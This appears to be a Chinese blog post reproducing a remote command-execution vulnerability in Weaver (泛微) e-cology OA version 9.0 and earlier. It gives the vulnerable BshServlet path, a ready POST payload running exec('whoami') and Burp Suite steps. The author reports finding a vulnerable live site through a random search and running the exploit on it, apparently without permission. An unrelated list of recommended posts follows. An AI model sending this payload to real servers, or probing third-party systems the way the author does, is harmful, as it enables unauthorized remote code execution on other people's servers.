记一次对泛微OA命令执行复现
最近圈子也是被泛微OA命令执行刷爆了。周一上班划水ing,想着来复现一下,顺便更新下博客。运气好随便搜索了一个就存在漏洞
0x01漏洞描述
泛微OA办公系统是一款协调办公软件。
泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。
0x02漏洞危害
攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。
0x03影响范围
泛微 e-cology<=9.0
0x04漏洞复现
漏洞路径: /weaver/bsh.servlet.BshServlet
poc:bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
访问该站域名加上漏洞路径如果存在,就有漏洞
访问后显示这样,点击按钮提交,神器burp抓包。将post内容替换先前的poc
bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
发送
成功复现
记一次对泛微OA命令执行复现相关推荐
- 泛微OA节点执行接口实现
泛微OA节点执行接口实现 该接口主要实现在流程的流转当中,实时通过自定义的动作去操作异构系统的数据或者处理其他一些特定的业务,在流程的节点后.出口和节点前都可以定义这样的自定义动作. 1. 接口实现方 ...
- 泛微OA系统多版本存在命令执行漏洞
0x01漏洞描述 泛微OA办公系统是一款协调办公软件. 泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限. 0x02漏洞危害 攻击者可以通过精心构造的请求包在受影响版本的泛微OA ...
- 【文档留存】泛微OA POC
泛微OA &&POC 泛微OA 多版本存在命令执行 POC&EXP来源于网络 漏洞描述: 泛微e-cology OA系统的J**A Beanshell接口可被未授权访问,攻击者 ...
- 泛微软件服务器是多少,泛微oa云服务器要求
泛微oa云服务器要求 内容精选 换一换 简要介绍Rsyslog是一个集中日志管理工具,基于流行的服务端/客户端模式,通过TCP或者UDP传输协议来发送日志信息,或者从网络设备.服务器.路由器.交换机. ...
- Android安卓-泛微OA Emobile7自动打卡
Android安卓-泛微OA Emobile7自动打卡 Emobile 公司使用背景 UI自动化环境搭建 adb常用命令 查询当前设备 多个设备之间切换 查询包名启动名 UI自动化appium代码 基 ...
- 漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞 漏洞描述 泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改 ...
- webservice python开发接口_基于Python的Webservice开发(四)-泛微OA的SOAP接口
一.功能需求 泛微e-cology可以在流程中调用Webservice接口实现与其他系统的联动等复杂功能.但是目前泛微文档中仅提供了调用的方法,但是没有关于接口的相关开发信息. 本次案例是用Pytho ...
- 泛微oa系统什么框架_泛微移动办公OA系统走进江苏国曜信息科技有限公司
近日,泛微凭借以"简单高效"为核心的协同OA办公系统与江苏国曜信息科技有限公司成功合作,泛微将助力企业信息化建设,促进其管理水平的迅速提升.江苏国曜信息科技有限公司成立于2018年 ...
- 泛微OA二次开发E8之UE富文本编辑器增加按钮操作
泛微OA协同办公系统在这里就不多作描述,有需要的可自行了解. 现在说说我遇到的问题以及解决方案. 遇到的需求问题 公司有自己的文件存储服务器,所以想把图片上传和文件上传都传输到自己的服务器上,所以需要 ...
最新文章
- 查看器_三款完美替代Windows10自带照片查看器的神器!
- 蓝桥杯利用字母可以组成一些美丽的图形,
- C++基本概念复习之二:多重继承、虚继承、纯虚函数(抽象类)
- linux shell脚本备份mysql数据库
- django 1.8 官方文档翻译: 2-3-2 关联对象参考
- asp.net 2.0 + sqlserver2005 数据依赖缓存
- javascript案例---简单的视觉效应
- 自己动手写操作系统(三)
- 利用爬虫大量抓取网页图片
- 通过tinyalsa中的tinymix来实现安卓通话录音的方法
- 基于MATLAB实现四阶龙格库塔法求解一、二阶微分方程实例
- MongoDB三分钟插入100万数据
- 北京航空航天大学计算机学院保研率,北京航空航天大学计算机学院(专业学位)计算机技术保研夏令营...
- VS 可扩展性开发(九):总结篇
- 文件加密系统是如何实现企业数据高效安全保护的?
- 直播推流拉流概念介绍
- hive 中文字符过滤_hive中文字符乱码 解决方法【转】
- WWDC19 内参完整解读正式出炉~
- ant jmeter 原理_Ant+Jmeter自动化接口测试
- 2021.12.9洛谷小书童——凯撒密码——c语言